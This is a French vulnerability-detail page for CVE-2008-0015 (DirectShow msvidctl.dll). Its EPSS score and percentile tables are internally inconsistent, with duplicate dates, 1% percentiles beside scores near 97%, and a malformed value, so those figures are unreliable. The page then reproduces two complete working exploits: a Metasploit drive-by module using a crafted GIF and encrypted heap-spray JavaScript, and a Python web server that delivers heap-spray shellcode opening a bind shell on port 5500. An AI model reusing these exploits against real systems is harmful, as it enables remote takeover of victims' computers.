CVE-2008-0015 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	84.32%	–	–
2023-03-12	–	–	–	97.2%	–
2023-04-16	–	–	–	97.13%	–
2023-05-28	–	–	–	96.98%	–
2023-07-16	–	–	–	97.2%	–
2023-08-27	–	–	–	97.17%	–
2023-10-15	–	–	–	97.24%	–
2023-11-26	–	–	–	97.3%	–
2024-01-07	–	–	–	97.13%	–
2024-02-18	–	–	–	96.86%	–
2024-03-31	–	–	–	96.84%	–
2024-06-02	–	–	–	96.97%	–
2024-06-16	–	–	–	96.45%	–
2024-07-21	–	–	–	96.32%	–
2024-09-01	–	–	–	96.66%	–
2024-10-06	–	–	–	96.7%	–
2024-11-03	–	–	–	96.51%	–
2024-12-15	–	–	–	96.7%	–
2024-12-22	–	–	–	95.82%	–
2025-01-19	–	–	–	95.78%	–
2025-02-23	–	–	–	95.94%	–
2025-01-19	–	–	–	95.78%	–
2025-02-23	–	–	–	95.94%	–
2025-03-18	–	–	–	–	83.96%
2025-03-30	–	–	–	–	84.09%
2025-03-30	–	–	–	–	84.09,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	1%
2023-03-12	1%
2023-04-16	1%
2023-05-28	1%
2023-07-16	1%
2023-08-27	1%
2023-10-15	1%
2023-11-26	1%
2024-01-07	1%
2024-02-18	1%
2024-03-31	1%
2024-06-02	1%
2024-06-16	1%
2024-07-21	1%
2024-09-01	1%
2024-10-06	1%
2024-11-03	1%
2024-12-15	1%
2024-12-22	1%
2025-01-19	1%
2025-02-23	1%
2025-01-19	1%
2025-02-23	1%
2025-03-18	99%
2025-03-30	99%
2025-03-30	99%

## # $Id: msvidctl_mpeg2.rb 9179 2010-04-30 08:40:19Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## ## # msvidctl_mpeg2.rb # # Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption exploit for the Metasploit Framework # # Tested successfully on the following platforms (fully patched 06/07/09): # - Internet Explorer 6, Windows XP SP2 # - Internet Explorer 7, Windows XP SP3 # # Original exploit was found in-the-wild used to preform drive-by attacks via compromised Chinese web sites. # The original exploit can be found here (shellcode changed to execute calc.exe): # http://www.rec-sec.com/exploits/aa.rar # # Trancer # http://www.rec-sec.com ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption', 'Description' => %q{ This module exploits a memory corruption within the MSVidCtl component of Microsoft DirectShow (BDATuner.MPEG2TuneRequest). By loading a specially crafted GIF file, an attacker can overrun a buffer and execute arbitrary code. ClassID is now configurable via an advanced option (otherwise randomized) - I)ruid }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancer <mtrancer[at]gmail.com>' ], 'Version' => '$Revision: 9179 $', 'References' => [ [ 'CVE', '2008-0015' ], [ 'OSVDB', '55651' ], [ 'BID', '35558' ], [ 'MSB', 'MS09-032' ], [ 'MSB', 'MS09-037' ], [ 'URL', 'http://www.microsoft.com/technet/security/advisory/972890.mspx' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00\x09\x0a\x0d'\\", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ] ], 'DisclosureDate' => 'Jul 05 2009', 'DefaultTarget' => 0)) register_advanced_options( [ OptString.new('ClassID', [ false, "Specific ClassID to use (otherwise randomized)", nil ]), ], self.class) @javascript_encode_key = rand_text_alpha(rand(10) + 10) end def on_request_uri(cli, request) if (request.uri.match(/\.gif$/i)) print_status("Sending GIF to #{cli.peerhost}:#{cli.peerport}...") gif = "\x00\x03\x00\x00\x11\x20\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" gif << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" gif << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" gif << "\xFF\xFF\xFF\xFF" # End of SEH chain gif << [target.ret].pack('V') # SE Handler gif << "\x00" send_response(cli, gif, { 'Content-Type' => 'image/gif' }) return end if (!request.uri.match(/\?\w+/)) send_local_redirect(cli, "?#{@javascript_encode_key}") return end print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...") # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Class IDs allclsids = [ # all IDs from the advisory "011B3619-FE63-4814-8A84-15A194CE9CE3", # doesn't work "0149EEDF-D08F-4142-8D73-D23903D21E90", # doesn't work "0369B4E5-45B6-11D3-B650-00C04F79498E", # works "0369B4E6-45B6-11D3-B650-00C04F79498E", # works "055CB2D7-2969-45CD-914B-76890722F112", # works "0955AC62-BF2E-4CBA-A2B9-A63F772D46CF", # works "15D6504A-5494-499C-886C-973C9E53B9F1", # works "1BE49F30-0E1B-11D3-9D8E-00C04F72D980", # doesn't work "1C15D484-911D-11D2-B632-00C04F79498E", # doesn't work "1DF7D126-4050-47F0-A7CF-4C4CA9241333", # doesn't work "2C63E4EB-4CEA-41B8-919C-E947EA19A77C", # doesn't work "334125C0-77E5-11D3-B653-00C04F79498E", # doesn't work "37B0353C-A4C8-11D2-B634-00C04F79498E", # doesn't work "37B03543-A4C8-11D2-B634-00C04F79498E", # doesn't work "37B03544-A4C8-11D2-B634-00C04F79498E", # doesn't work "418008F3-CF67-4668-9628-10DC52BE1D08", # doesn't work "4A5869CF-929D-4040-AE03-FCAFC5B9CD42", # doesn't work "577FAA18-4518-445E-8F70-1473F8CF4BA4", # doesn't work "59DC47A8-116C-11D3-9D8E-00C04F72D980", # works "7F9CB14D-48E4-43B6-9346-1AEBC39C64D3", # doesn't work "823535A0-0318-11D3-9D8E-00C04F72D980", # doesn't work "8872FF1B-98FA-4D7A-8D93-C9F1055F85BB", # doesn't work "8A674B4C-1F63-11D3-B64C-00C04F79498E", # works "8A674B4D-1F63-11D3-B64C-00C04F79498E", # works "9CD64701-BDF3-4D14-8E03-F12983D86664", # doesn't work "9E77AAC4-35E5-42A1-BDC2-8F3FF399847C", # doesn't work "A1A2B1C4-0E3A-11D3-9D8E-00C04F72D980", # doesn't work "A2E3074E-6C3D-11D3-B653-00C04F79498E", # doesn't work "A2E30750-6C3D-11D3-B653-00C04F79498E", # works "A8DCF3D5-0780-4EF4-8A83-2CFFAACB8ACE", # doesn't work "AD8E510D-217F-409B-8076-29C5E73B98E8", # doesn't work "B0EDF163-910A-11D2-B632-00C04F79498E", # doesn't work "B64016F3-C9A2-4066-96F0-BD9563314726", # works "BB530C63-D9DF-4B49-9439-63453962E598", # doesn't work "C531D9FD-9685-4028-8B68-6E1232079F1E", # doesn't work "C5702CCC-9B79-11D3-B654-00C04F79498E", # doesn't work "C5702CCD-9B79-11D3-B654-00C04F79498E", # doesn't work "C5702CCE-9B79-11D3-B654-00C04F79498E", # doesn't work "C5702CCF-9B79-11D3-B654-00C04F79498E", # doesn't work "C5702CD0-9B79-11D3-B654-00C04F79498E", # doesn't work "C6B14B32-76AA-4A86-A7AC-5C79AAF58DA7", # works "CAAFDD83-CEFC-4E3D-BA03-175F17A24F91", # doesn't work "D02AAC50-027E-11D3-9D8E-00C04F72D980", # doesn't work "F9769A06-7ACA-4E39-9CFB-97BB35F0E77E", # works "FA7C375B-66A7-4280-879D-FD459C84BB02", # doesn't work ] clsids = [ # these all work "0369B4E5-45B6-11D3-B650-00C04F79498E", # works "0369B4E6-45B6-11D3-B650-00C04F79498E", # works "055CB2D7-2969-45CD-914B-76890722F112", # works "0955AC62-BF2E-4CBA-A2B9-A63F772D46CF", # works "15D6504A-5494-499C-886C-973C9E53B9F1", # works "59DC47A8-116C-11D3-9D8E-00C04F72D980", # works "8A674B4C-1F63-11D3-B64C-00C04F79498E", # works "8A674B4D-1F63-11D3-B64C-00C04F79498E", # works "A2E30750-6C3D-11D3-B653-00C04F79498E", # works "B64016F3-C9A2-4066-96F0-BD9563314726", # works "C6B14B32-76AA-4A86-A7AC-5C79AAF58DA7", # works "F9769A06-7ACA-4E39-9CFB-97BB35F0E77E", # works ] classid = datastore['ClassID'] || clsids[rand(clsids.size)] # Encode the shellcode shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) # Setup exploit buffers nops = Rex::Text.to_unescape([target.ret].pack('V')) blocksize = 0x40000 fillto = 500 # Randomize the javascript variable names msvidctl = rand_text_alpha(rand(100) + 1) div = rand_text_alpha(rand(100) + 1) j_shellcode = rand_text_alpha(rand(100) + 1) j_nops = rand_text_alpha(rand(100) + 1) j_headersize = rand_text_alpha(rand(100) + 1) j_slackspace = rand_text_alpha(rand(100) + 1) j_fillblock = rand_text_alpha(rand(100) + 1) j_block = rand_text_alpha(rand(100) + 1) j_memory = rand_text_alpha(rand(100) + 1) j_counter = rand_text_alpha(rand(30) + 2) host = Rex::Socket.source_address(cli.peerhost) + ":" + datastore["SRVPORT"] gif_uri = "http#{(datastore['SSL'] ? 's' : '')}://#{host}" if ("/" == get_resource[-1,1]) gif_uri << get_resource[0, get_resource.length - 1] else gif_uri << get_resource end gif_uri << "/" + Time.now.to_i.to_s + ".gif" js = %Q|#{j_shellcode}=unescape('#{shellcode}'); #{j_nops}=unescape('#{nops}'); #{j_headersize}=20; #{j_slackspace}=#{j_headersize}+#{j_shellcode}.length; while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops}; #{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace}); #{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace}); while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock}; #{j_memory}=new Array(); for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode}; var #{msvidctl}=document.createElement('object'); #{div}.appendChild(#{msvidctl}); #{msvidctl}.width='1'; #{msvidctl}.height='1'; #{msvidctl}.data='#{gif_uri}'; #{msvidctl}.classid='clsid:#{classid}';| js_encoded = encrypt_js(js, @javascript_encode_key) html = %Q|<html> <body> <div id="#{div}"> <script> #{js_encoded} </script> </body> </html>| print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response(cli, html, { 'Content-Type' => 'text/html' }) # Handle the payload handler(cli) end end

#!/usr/bin/env python ###################################################################################### # MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray (Advisory 972890) # ###################################################################################### # # # Written by SecureState R&D Team # # Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin # # http://www.securestate.com # # # # win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind # # # ###################################################################################### # Tested on WinXPSP3, Win2k3SP2, WinXPSP2 on IE6 and IE7 # ###################################################################################### # # # This exploit is publicly being exploited in the wild, opted to release this # # to the research community. Microsoft is aware of the vulnerability. # # # ###################################################################################### # # # [-] Exploit sent... [-] # # [-] Wait about 30 seconds and attempt to connect.[-] # # [-] Connect to IP Address: 10.211.55.140 and port 5500 [-] # # # # relik@sslinuxvm1:~$ telnet 10.211.55.140 5500 # # Trying 10.211.55.140... # # Connected to 10.211.55.140. # # Escape character is '^]'. # # Microsoft Windows [Version 5.2.3790] # # (C) Copyright 1985-2003 Microsoft Corp. # # # # C:\Documents and Settings\Administrator\Desktop> # # # # # # NOTE: The javascript code is not obfuscated in anyway, normal A/V should pick this # # up. This is intentional. # # # # Improved reliability, appears to be about 95 percent of the time. Adjusted the # # spray size a bit. # # # ###################################################################################### from BaseHTTPServer import HTTPServer from BaseHTTPServer import BaseHTTPRequestHandler import sys,binascii try: import psyco psyco.full() except ImportError: pass class myRequestHandler(BaseHTTPRequestHandler): try: def do_GET(self): # Always Accept GET self.printCustomHTTPResponse(200) # trigger the overflow *boom* if self.path == "/ohn0es.jpg": unhex=binascii.unhexlify("000300001120340000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0c0c0c0c00") self.wfile.write(unhex) if self.path == "/": target=self.client_address[0] self.wfile.write("""<html><head>""") self.wfile.write(""" <script language="JavaScript" defer> function Check() { // win32_bind - EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai http://metasploit.com */ var shellcode = unescape("%ud9db%u74d9%uf424%uc929%u51b1%u02bf%u6c21%u588e%u7831%u8317%u04c0%u7a03%u8e32%u867b%ua55e%u9ec9%uc666%ua12d%ub2f9%u79be%u4fde%ubd7b%u2c95%uc581%u23a8%u7a02%u30b3%ua44a%uadc2%u2f3c%ubaf0%uc1be%u7cc8%ub159%ubdaf%uce2e%uf76e%ud1c2%ue3b2%uea29%ud066%u79f9%u9362%ua5a5%u4f6d%u2e3f%uc461%u6f4b%udb66%u8ca0%u50ba%ufebf%u7ae6%u3da1%u59d7%u4a45%u6e5b%u0c0d%u0550%u9061%u92c5%ua0c2%ucd4b%ufe4c%ue17d%u0101%u9f57%u9bf2%u5330%u0bc7%ue0b6%u9415%uf86c%u428a%ueb46%ua9d7%u0b08%u92f1%u1621%uad98%ud1df%uf867%ue075%ud298%u3de2%u276f%uea5f%u118f%u46f3%uce23%u2ba7%ub390%u5314%u55c6%ubef3%uff9b%u4850%u6a82%uee3e%ue45f%ub978%ud2a0%u56ed%u8f0e%u860e%u8bd8%u095c%u84f0%u8061%u7f51%ufd61%u9a3e%u78d4%u33f7%u5218%uef58%u0eb2%udfa6%ud9a8%ua6bf%u6008%ua717%uc643%u8768%u830a%u41f2%u30bb%u0496%uddde%u4f38%uee08%u8830%uaa20%ub4cb%uf284%u923f%ub019%u1c92%u19a7%u6d7e%u5a52%uc62b%uf208%ue659%u15fc%u6361%ue547%ud04b%u4b10%ub725%u01cf%u66c4%u80a1%u7797%u4391%u5eb5%u5a17%u9f96%u08ce%ua0e6%u33d8%ud5c8%u3070%u2d6a%u371a%uffbb%u171c%u0f2c%u9c68%ubcf2%u4b92%u92f3"); var bigblock = unescape("%u9090%u9090"); var headersize = 20; var slackspace = headersize + shellcode.length; while (bigblock.length < slackspace) bigblock += bigblock; var fillblock = bigblock.substring(0,slackspace); var block = bigblock.substring(0,bigblock.length - slackspace); // Original spray size below, use if you want exploit to load faster with higher crash rate. // while (block.length + slackspace < 0x40000) block = block + block + fillblock; while (block.length + slackspace < 0x70000) block = block + block + fillblock; var memory = new Array(); for (i = 0; i < 350; i++){ memory[i] = block + shellcode} var myObject=document.createElement('object'); DivID.appendChild(myObject); myObject.width='1'; myObject.height='1'; myObject.data='./ohn0es.jpg'; // Vulnerable ID myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF'; } </script> </head> <body onload="Check();"> <div id="DivID">""") self.wfile.write("""<title>MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray (Advisory 972890)</title></head><body>""") self.wfile.write("""<left><body bgcolor="Black"><font color="White"> ############################################################################### <br>MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray (Advisory 972890) <br>Written by SecureState R&D Team <br>Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin <br>http://www.securestate.com <br>win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind <br>Tested on WinXPSP3, Win2k3SP2, WinXPSP2 on IE6 and IE7 <br>###############################################################################<br> <br>""") print ("\n\n[-] Exploit sent... [-]\n[-] Wait about 30 seconds and attempt to connect.[-]\n[-] Connect to IP Address: %s and port 5500 [-]" % (target)) # Print custom HTTP Response def printCustomHTTPResponse(self, respcode): self.send_response(respcode) self.send_header("Content-type", "text/html") self.send_header("Server", "myRequestHandler") self.end_headers() # In case of exceptions, pass them except Exception: pass httpd = HTTPServer(('', 80), myRequestHandler) print (""" ##################################################################################### # MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray (Advisory 972890) # ##################################################################################### # # # Written by SecureState R&D Team # # Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin # # http://www.securestate.com # # # # win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind # # # ##################################################################################### # Tested on WinXPSP3, Win2k3SP2, WinXPSP2 on IE6 and IE7 # ##################################################################################### """) print ("[-] Starting MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray [-]") print ("[-] Have someone connect to you on port 80 [-]") print ("\n\nType <control>-c to exit..") try: # handle the connections httpd.handle_request() # Serve HTTP server forever httpd.serve_forever() # Except Keyboard Interrupts and throw custom message except KeyboardInterrupt: print ("\n\nExiting exploit...\n\n") sys.exit(1) # milw0rm.com [2009-07-10]